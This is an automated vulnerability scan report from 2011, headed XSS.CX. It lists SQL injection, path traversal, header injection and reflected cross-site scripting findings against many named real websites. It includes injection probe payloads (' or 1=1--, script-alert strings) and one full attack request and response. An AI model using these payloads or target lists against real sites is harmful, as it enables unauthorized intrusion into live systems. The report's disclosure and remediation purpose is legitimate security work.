XSS, SQL Injection, HTTP Header Injection, Path Traversal, DORK, PoC

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | CWE-23: Relative Path Traversal

Report generated by XSS.CX at Wed Apr 20 11:28:22 CDT 2011.

Loading

1. SQL injection

1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]

1.4. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.5. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]

1.6. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]

1.7. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]

1.8. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]

1.9. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]

1.10. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]

1.11. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]

1.12. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]

1.13. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]

1.14. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]

1.15. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]

1.16. http://www.curtis.com/favicon.ico [CFID cookie]

1.17. http://www.curtis.com/favicon.ico [CFTOKEN cookie]

1.18. http://www.curtis.com/favicon.ico [REST URL parameter 1]

1.19. http://www.curtis.com/favicon.ico [__utma cookie]

1.20. http://www.curtis.com/favicon.ico [__utmb cookie]

1.21. http://www.curtis.com/favicon.ico [__utmc cookie]

1.22. http://www.curtis.com/favicon.ico [__utmz cookie]

1.23. http://www.curtis.com/favicon.ico [sifrFetch cookie]

1.24. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]

1.25. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]

1.26. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]

1.27. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]

1.28. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]

1.29. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]

1.30. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]

1.31. http://www.curtis.com/sitecontent.cfm [CFID cookie]

1.32. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]

1.33. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]

1.34. http://www.curtis.com/sitecontent.cfm [__utma cookie]

1.35. http://www.curtis.com/sitecontent.cfm [__utmb cookie]

1.36. http://www.curtis.com/sitecontent.cfm [__utmc cookie]

1.37. http://www.curtis.com/sitecontent.cfm [__utmz cookie]

1.38. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]

1.39. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]

1.40. http://www.millerwelds.com/about/ [REST URL parameter 1]

1.41. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]

1.42. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

1.43. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]

1.44. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]

1.45. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

1.46. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

1.47. http://www.millerwelds.com/financing/ [REST URL parameter 1]

1.48. http://www.millerwelds.com/financing/ [int_campaign parameter]

1.49. http://www.millerwelds.com/financing/ [int_content parameter]

1.50. http://www.millerwelds.com/financing/ [int_medium parameter]

1.51. http://www.millerwelds.com/financing/ [int_source parameter]

1.52. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]

1.53. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

1.54. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

1.55. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

1.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

1.57. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

1.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

1.59. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

1.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

1.61. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]

1.62. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.63. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]

1.64. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.65. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

1.66. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]

1.67. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

1.68. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]

1.69. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]

1.70. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

1.71. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]

1.72. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]

1.73. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]

1.74. http://www.millerwelds.com/resources/ [REST URL parameter 1]

1.75. http://www.millerwelds.com/resources/ [name of an arbitrarily supplied request parameter]

1.76. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

1.77. http://www.millerwelds.com/service/ [REST URL parameter 1]

1.78. http://www.millerwelds.com/service/ [name of an arbitrarily supplied request parameter]

1.79. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

1.80. http://www.millerwelds.com/wheretobuy/ [name of an arbitrarily supplied request parameter]

1.81. http://www.socialfollow.com/button/image/ [b parameter]

2. File path traversal

2.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

2.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

3. HTTP header injection

3.1. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON [REST URL parameter 1]

3.2. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON [REST URL parameter 1]

3.3. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]

3.4. http://ad.doubleclick.net/getcamphist [src parameter]

3.5. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 1]

3.6. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 2]

3.7. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 3]

3.8. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 1]

3.9. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 2]

3.10. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 3]

3.11. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [S cookie]

3.12. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359 [vmf parameter]

4. Cross-site scripting (reflected)

4.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

4.2. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]

4.3. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

4.4. http://digg.com/submit [REST URL parameter 1]

4.5. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [callback parameter]

4.6. http://ds.addthis.com/red/psi/sites/www.curtis.com/p.json [callback parameter]

4.7. http://event.adxpose.com/event.flow [uid parameter]

4.8. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

4.9. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

4.10. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

4.11. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

4.12. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

4.13. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

4.14. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

4.15. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

4.16. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

4.17. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

4.18. http://jqueryui.com/themeroller/css/parseTheme.css.php [c95d2 parameter]

4.19. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

4.20. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

4.21. http://mochibot.com/my/core.swf [f parameter]

4.22. http://mochibot.com/my/core.swf [mv parameter]

4.23. http://mochibot.com/my/core.swf [sb parameter]

4.24. http://mochibot.com/my/core.swf [swfid parameter]

4.25. http://widgets.digg.com/buttons/count [url parameter]

4.26. http://www.arnoldporter.com/industries.cfm [name of an arbitrarily supplied request parameter]

4.27. http://www.arnoldporter.com/industries.cfm [nsextt parameter]

4.28. http://www.arnoldporter.com/industries.cfm [u parameter]

4.29. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

4.30. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

4.31. http://www.curtis.com/emaildisclaimer.cfm [itemID parameter]

4.32. http://www.curtis.com/emaildisclaimer.cfm [itemType parameter]

4.33. http://www.curtis.com/sitecontent.cfm [name of an arbitrarily supplied request parameter]

4.34. http://www.faegre.co.uk/11572 [REST URL parameter 1]

4.35. http://www.faegre.co.uk/11572 [name of an arbitrarily supplied request parameter]

4.36. http://www.faegre.co.uk/59 [REST URL parameter 1]

4.37. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

4.38. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

4.39. http://www.faegre.co.uk/bios [REST URL parameter 1]

4.40. http://www.faegre.co.uk/bios [name of an arbitrarily supplied request parameter]

4.41. http://www.faegre.co.uk/community [REST URL parameter 1]

4.42. http://www.faegre.co.uk/community [name of an arbitrarily supplied request parameter]

4.43. http://www.faegre.co.uk/eventtypes [REST URL parameter 1]

4.44. http://www.faegre.co.uk/eventtypes [name of an arbitrarily supplied request parameter]

4.45. http://www.faegre.co.uk/favicon.ico [REST URL parameter 1]

4.46. http://www.faegre.co.uk/getdoc.aspx [REST URL parameter 1]

4.47. http://www.faegre.co.uk/index.aspx [REST URL parameter 1]

4.48. http://www.faegre.co.uk/jscripts.js [REST URL parameter 1]

4.49. http://www.faegre.co.uk/rankingawards [REST URL parameter 1]

4.50. http://www.faegre.co.uk/rankingawards [name of an arbitrarily supplied request parameter]

4.51. http://www.faegre.co.uk/showlocation.aspx [REST URL parameter 1]

4.52. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

4.53. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

4.54. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

4.55. http://www.friedfrank.com/ [name of an arbitrarily supplied request parameter]

4.56. http://www.friedfrank.com/index.cfm [more parameter]

4.57. http://www.friedfrank.com/index.cfm [name of an arbitrarily supplied request parameter]

4.58. http://www.humaniplex.com/blogs/ [name of an arbitrarily supplied request parameter]

4.59. http://www.humaniplex.com/classifieds/ [name of an arbitrarily supplied request parameter]

4.60. http://www.humaniplex.com/clubs/list [REST URL parameter 2]

4.61. http://www.humaniplex.com/clubs/list [name of an arbitrarily supplied request parameter]

4.62. http://www.humaniplex.com/flirts/ [name of an arbitrarily supplied request parameter]

4.63. http://www.humaniplex.com/index.html [name of an arbitrarily supplied request parameter]

4.64. http://www.humaniplex.com/mingle [name of an arbitrarily supplied request parameter]

4.65. http://www.humaniplex.com/mingle/ [name of an arbitrarily supplied request parameter]

4.66. http://www.humaniplex.com/profiles/ [name of an arbitrarily supplied request parameter]

4.67. http://www.humaniplex.com/tos/site.html [qs parameter]

4.68. http://www.humaniplex.com/tos/site.html [qs parameter]

4.69. http://www.humaniplex.com/user_tools/forgot_password/ [name of an arbitrarily supplied request parameter]

4.70. http://www.humaniplex.com/user_tools/join/ [name of an arbitrarily supplied request parameter]

4.71. http://www.leaseweb.com/en [REST URL parameter 1]

4.72. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

4.73. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

4.74. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 1]

4.75. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 2]

4.76. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 3]

4.77. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 1]

4.78. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 2]

4.79. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 3]

4.80. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 1]

4.81. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 2]

4.82. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 3]

4.83. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 4]

4.84. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 5]

4.85. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]

4.86. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 1]

4.87. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 2]

4.88. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 1]

4.89. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 2]

4.90. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

4.91. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

4.92. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

4.93. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 1]

4.94. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 2]

4.95. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 3]

4.96. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 1]

4.97. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 2]

4.98. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 3]

4.99. http://www.leaseweb.com/osdd.xml [REST URL parameter 1]

4.100. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 1]

4.101. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 2]

4.102. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

4.103. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

4.104. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 1]

4.105. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 2]

4.106. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 3]

4.107. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

4.108. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

4.109. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

4.110. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

4.111. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

4.112. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

4.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

4.114. http://www.martindale.com/Results.aspx [ft parameter]

4.115. http://www.martindale.com/Results.aspx [ft parameter]

4.116. http://www.martindale.com/Results.aspx [hid parameter]

4.117. http://www.martindale.com/Results.aspx [sh parameter]

4.118. http://www.millerwelds.com/about/ [REST URL parameter 1]

4.119. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

4.120. http://www.millerwelds.com/financing/ [REST URL parameter 1]

4.121. http://www.millerwelds.com/financing/ [int_campaign parameter]

4.122. http://www.millerwelds.com/financing/ [int_content parameter]

4.123. http://www.millerwelds.com/financing/ [int_medium parameter]

4.124. http://www.millerwelds.com/financing/ [int_source parameter]

4.125. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

4.126. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

4.127. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

4.128. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

4.129. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

4.130. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

4.131. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

4.132. http://www.millerwelds.com/resources/ [REST URL parameter 1]

4.133. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

4.134. http://www.millerwelds.com/service/ [REST URL parameter 1]

4.135. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

4.136. http://www.mypowerblock.com/xn/loader [r parameter]

4.137. http://www.nike.com/nikeos/p/nikegolf/en_US/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter]

4.138. http://www.nike.com/nikeos/p/nikegolf/en_US/ [name of an arbitrarily supplied request parameter]

4.139. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress [includes parameter]

4.140. http://www.nike.com/nsl/services/user/isloggedin [REST URL parameter 4]

4.141. http://www.nike.com/nsl/services/user/isloggedin [callback parameter]

4.142. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

4.143. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

4.144. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

4.145. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

4.146. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [h parameter]

4.147. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [w parameter]

4.148. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

4.149. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

4.150. http://www.rockyou.com/developer/opensocial/opensocial-css.php [name of an arbitrarily supplied request parameter]

4.151. http://www.rockyou.com/developer/opensocial/opensocial-css.php [title parameter]

4.152. http://www.rockyou.com/login/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter]

4.153. http://www.rockyou.com/login/ [name of an arbitrarily supplied request parameter]

4.154. http://www.rockyou.com/login/index.php [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter]

4.155. http://www.rockyou.com/login/index.php [name of an arbitrarily supplied request parameter]

4.156. http://www.rockyou.com/show_my_gallery.php [instanceid parameter]

4.157. http://www.socialfollow.com/button/ [b parameter]

4.158. http://www.socialfollow.com/button/ [b parameter]

4.159. http://www.socialfollow.com/button/css/ [b parameter]

4.160. http://www.socialfollow.com/button/css/ [socialSites parameter]

4.161. http://www.socialfollow.com/login.php [tEmail parameter]

4.162. http://www.viglink.com/users/login [ar parameter]

4.163. http://www.viglink.com/users/login [ar parameter]

4.164. https://www.viglink.com/users/login [ar parameter]

4.165. https://www.viglink.com/users/login [ar parameter]

4.166. http://www.ypg.com/en [REST URL parameter 1]

4.167. http://www.ypg.com/en/ [REST URL parameter 1]

4.168. http://www.ypg.com/en/contact-us [REST URL parameter 1]

4.169. http://www.ypg.com/en/contact-us [REST URL parameter 2]

4.170. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]

4.171. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]

4.172. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]

4.173. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]

4.174. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

4.175. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

4.176. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

4.177. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

4.178. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]

4.179. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]

4.180. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]

4.181. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]

4.182. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]

4.183. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]

4.184. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]

4.185. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]

4.186. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]

4.187. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]

4.188. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]

4.189. http://www.zoomerang.com/Survey/TinyMCE.ashx [font parameter]

4.190. http://mochibot.com/my/core.swf [Referer HTTP header]

4.191. http://www.arnoldporter.com/ [Referer HTTP header]

4.192. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

4.193. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

4.194. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

4.195. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

4.196. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

4.197. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

4.198. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

4.199. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

4.200. http://www.friedfrank.com/ [User-Agent HTTP header]

4.201. http://www.friedfrank.com/includes/vcard.cfm [User-Agent HTTP header]

4.202. http://www.friedfrank.com/index.cfm [User-Agent HTTP header]

4.203. http://www.friedfrank.com/printfriendly.cfm [User-Agent HTTP header]


1. SQL injection  next
There are 81 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12883928'%20or%201%3d1--%20 and 12883928'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUlVo69RiZ0jqNPgQ_eE4qd7lFX20AAAtmYASPTEpRhaPmmXNtd4EAAAEvZiQJWw--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:28 GMT; Path=/
Set-Cookie: UA=AAAAAQAUshtdxv8Nep7WiQfS0VXCFGEDCiEDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FMxrIBgPf1fUglQwsIYwgCiwZA5ECACQyB7o-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2985
Date: Mon, 18 Apr 2011 01:05:27 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
